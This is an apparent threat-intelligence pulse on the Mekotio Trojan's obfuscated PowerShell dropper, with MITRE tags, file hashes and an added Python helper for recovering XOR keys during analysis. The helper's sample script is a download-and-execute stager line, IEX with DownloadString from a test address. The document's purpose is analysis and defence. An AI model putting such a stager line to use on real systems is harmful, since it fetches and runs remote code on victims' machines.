This pulse covers the Mekotio Trojan, a malware family that uses a PowerShell dropper to stage and execute its payload. The dropper hides its logic behind obfuscation, including a custom XOR decryption routine that unpacks embedded content at run time. Once running, it collects system information, contacts a command-and-control server to fetch additional payloads, and establishes persistence through system modifications of the kind covered by T1547.001 (registry Run keys or startup-folder entries). The main payload consists of executable and script files used to carry out the malicious activity. Author: AlienVault
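The summary above mentions a custom XOR decryption step but gives neither the key nor the exact scheme, which is the usual situation when a dropper lands on an analyst's desk. The following is an added example, not AlienVault's pulse data or Mekotio's own code: it assumes the simplest common variant (a repeating-byte XOR over an embedded blob) and recovers the key by a known-plaintext attack, sliding a crib such as `DownloadString` across the ciphertext. The sample script, the 5-byte key, and the TEST-NET address 203.0.113.5 are all constructed for the demo; it generalizes to any key length up to `max_keylen`, not just the page's case.

```python
"""Analyst helper for XOR-obfuscated PowerShell droppers.

Added example, not code from the AlienVault pulse or from Mekotio. The real
dropper's key and scheme are not on the page; this assumes a repeating-byte
XOR and recovers the key from a crib the decoded script is expected to contain.
"""
import re
from typing import Optional, Tuple

# Constructed sample: a stager-like one-liner and a 5-byte key chosen for this
# demo. The URL uses the reserved TEST-NET-3 range; nothing here is a real IOC.
SAMPLE_SCRIPT = (b"$u='http://203.0.113.5/stage2.ps1';"
                 b"IEX(New-Object Net.WebClient).DownloadString($u)")
SAMPLE_KEY = bytes([0x5A, 0x13, 0x7F, 0x21, 0x9C])


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR each byte of data with the key, cycling the key (encrypt == decrypt)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# What the "obfuscated" blob inside the dropper would look like for the sample.
SAMPLE_CIPHERTEXT = xor_repeating(SAMPLE_SCRIPT, SAMPLE_KEY)


def looks_like_text(data: bytes) -> bool:
    """True if every byte is printable ASCII or common whitespace."""
    return all(0x20 <= b < 0x7F or b in b"\t\r\n" for b in data)


def recover_key(ciphertext: bytes, crib: bytes,
                max_keylen: int = 16) -> Optional[Tuple[bytes, bytes]]:
    """Known-plaintext attack on repeating-key XOR.

    For every key length and every offset, XOR the crib against the ciphertext
    to derive the key bytes the crib would imply. A candidate is accepted only
    if those bytes never conflict, the crib is long enough to pin down every
    key byte, and decrypting the whole blob yields printable text.
    Returns (key, plaintext) or None.
    """
    for keylen in range(1, max_keylen + 1):
        if len(crib) < keylen:
            break  # crib too short to determine every key byte
        for offset in range(len(ciphertext) - len(crib) + 1):
            key = [None] * keylen
            consistent = True
            for i, p in enumerate(crib):
                pos = (offset + i) % keylen
                kb = ciphertext[offset + i] ^ p
                if key[pos] is None:
                    key[pos] = kb
                elif key[pos] != kb:
                    consistent = False
                    break
            if not consistent:
                continue
            candidate = bytes(key)  # fully populated: len(crib) >= keylen
            plaintext = xor_repeating(ciphertext, candidate)
            if looks_like_text(plaintext):
                return candidate, plaintext
    return None


URL_RE = re.compile(rb"https?://[^\s'\"()<>]+")


def extract_urls(plaintext: bytes) -> list:
    """Pull candidate C2 / stage-download URLs out of a decoded script."""
    return [m.decode("ascii", "replace") for m in URL_RE.findall(plaintext)]


def defang(url: str) -> str:
    """Make a URL safe to paste into a report (http -> hxxp, '.' -> '[.]')."""
    return url.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    result = recover_key(SAMPLE_CIPHERTEXT, b"DownloadString")
    if result is None:
        raise SystemExit("no consistent key found; try another crib or longer max_keylen")
    key, script = result
    print("recovered key:", key.hex())
    print("decoded script:", script.decode())
    for url in extract_urls(script):
        print("download/C2 candidate:", defang(url))
```

The crib is the analyst's lever: `DownloadString`, `IEX`, `Invoke-Expression`, `New-Object` and `http://` are all reasonable guesses for a PowerShell stager, and the printable-text check discards the spurious key fragments that short cribs otherwise produce. If the real sample XORs a binary (the page notes the payload includes executables), swap `looks_like_text` for a check on the `MZ` header and use a crib from the PE stub instead.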
Related Tags:
T1064
Obfuscation
T1547.001
T1059.001
persistence
trojan
T1071
T1005
T1083
Associated Indicators:
0241E528277ED955CF8B4991D261D6E4DBA1F509 (40 hex digits: SHA-1 file hash)
CC1582CA08498560A84FDF4E795FB63F (32 hex digits: MD5 file hash; the pulse does not state whether the two hashes refer to the same file)